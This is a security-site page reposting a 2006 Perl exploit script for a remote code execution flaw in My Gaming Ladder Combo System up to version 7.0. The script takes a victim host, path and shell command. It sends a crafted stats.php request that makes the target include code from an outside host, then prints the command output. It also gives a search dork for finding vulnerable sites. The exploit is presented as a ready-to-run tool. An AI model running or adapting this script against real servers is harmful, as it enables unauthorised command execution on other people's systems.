首页 | 安全文章 | 安全工具 | Exploits | 本站原创 | 关于我们 | 网站地图 | 安全论坛

当前位置：主页>安全文章>文章资料>Exploits>文章内容 My Gaming Ladder Combo System <= 7.0 Remote Code Execution Exploit 来源：www.nukedx.com 作者：nukedx 发布时间：2006-04-25   #!/usr/bin/perl #Method found & Exploit scripted by nukedx #Contacts > ICQ: 10072 MSN/Main: nukedx@nukedx.com web: www.nukedx.com #Original advisory: http://www.nukedx.com/?viewdoc=28 #Usage: ladder.pl <host> <path> <cmd> #Dork: "Ladder Scripts by http://www.mygamingladder.com" 40.500 pages. use IO::Socket; if(@ARGV < 3) { usage(); } else { exploit(); } sub header() { print "\n- NukedX Security Advisory Nr.2006-28\r\n"; print "- My Gaming Ladder Combo System <= 7.0 Remote Command Execution Exploit\r\n"; } sub main::urlEncode { my ($string) = @_; $string =~ s/(\W)/"%" . unpack("H2", $1)/ge; #$string# =~ tr/.//; return $string; } sub usage() { header(); print "- Usage: $0 <host> <path> <cmd>\r\n"; print "- <host> -> Victim's host ex: www.victim.com\r\n"; print "- <path> -> Path to My Gaming Ladder ex: /ladder/\r\n"; print "- <cmd> -> Command to execute ex: ls -la\r\n"; print "- This exploit needs allow_url_fopen set to 1 and register_globals on\r\n"; exit(); } sub exploit () { #Our variables... $echoing = ""; $ldserver = $ARGV[0]; $ldserver =~ s/(http:\/\/)//eg; $ldhost = "http://".$ldserver; $lddir = $ARGV[1]; $ldport = "80"; $ldtar = "stats.php?dir[func]=&dir[base]=http://www.misssera.com.tr/old/rce.txt%3F&command="; $ldcmd = ""; for ($i=2; $i<=$#ARGV; $i++) {$ldcmd.="%20".urlEncode($ARGV[$i]);}; $ldreq = $ldhost.$lddir.$ldtar.$ldcmd; #Sending data... header(); print "- Trying to connect: $ldserver\r\n"; $ld = IO::Socket::INET->new(Proto => "tcp", PeerAddr => "$ldserver", PeerPort => "$ldport") || die "- Connection failed...\n"; print $ld "GET $ldreq HTTP/1.1\n"; print $ld "Accept: */*\n"; print $ld "Referer: $ldhost\n"; print $ld "Accept-Language: tr\n"; print $ld "User-Agent: NukeZilla\n"; print $ld "Cache-Control: no-cache\n"; print $ld "Host: $ldserver\n"; print $ld "Connection: close\n\n"; print "- Connected...\r\n"; $echoing = "No"; while ($answer = <$ld>) { if ($answer =~ /NukedX here/) { $echoing = "Yes"; } if ($answer =~ /NukedX was here/) { print "- End of results\n"; exit(); } if ($echoing =~ /Yes/) { if ($answer =~ /NukedX here/) { print "- Command executed succesfully here is results\r\n"; } else { print "$answer"; } } } #Exploit failed... print "- Exploit failed\n" }   [推荐] [评论(0条)] [返回顶部] [打印本页] [关闭窗口]   匿名评论 评论内容：(不能超过250字，需审核后才会公布，请自觉遵守互联网相关政策法规。  §最新评论：

热点文章 ·CVE-2012-0217 Intel sysret exp ·Linux Kernel 2.6.32 Local Root ·Array Networks vxAG / xAPV Pri ·Novell NetIQ Privileged User M ·Array Networks vAPV / vxAG Cod ·Excel SLYK Format Parsing Buff ·PhpInclude.Worm - PHP Scripts ·Apache 2.2.0 - 2.2.11 Remote e ·VideoScript 3.0 <= 4.0.1.50 Of ·Yahoo! Messenger Webcam 8.1 Ac ·Family Connections <= 1.8.2 Re ·Joomla Component EasyBook 1.1   相关文章 ·PHPSurveyor <= 0.995 (surve ·Apple Mac OS X Safari <= 2. ·PCPIN Chat <= 5.0.4 (login/ ·FlexBB <= 0.5.5 (function/s ·Mambo <= 4.5.3 , Joomla < ·Mozilla Firefox <= 1.5.0.2 ·ASPSitem <= 1.83 (Haberler. ·Fenice OMS 1.10 (long get requ ·PHP Net Tools <= 2.7.1 Remo ·OCE 3121/3122 Printer (parser. ·Internet PhotoShow (page) Remo ·Oracle <= 10g Release 2 (DB   推荐广告

CopyRight © 2002-2022 VFocuS.Net All Rights Reserved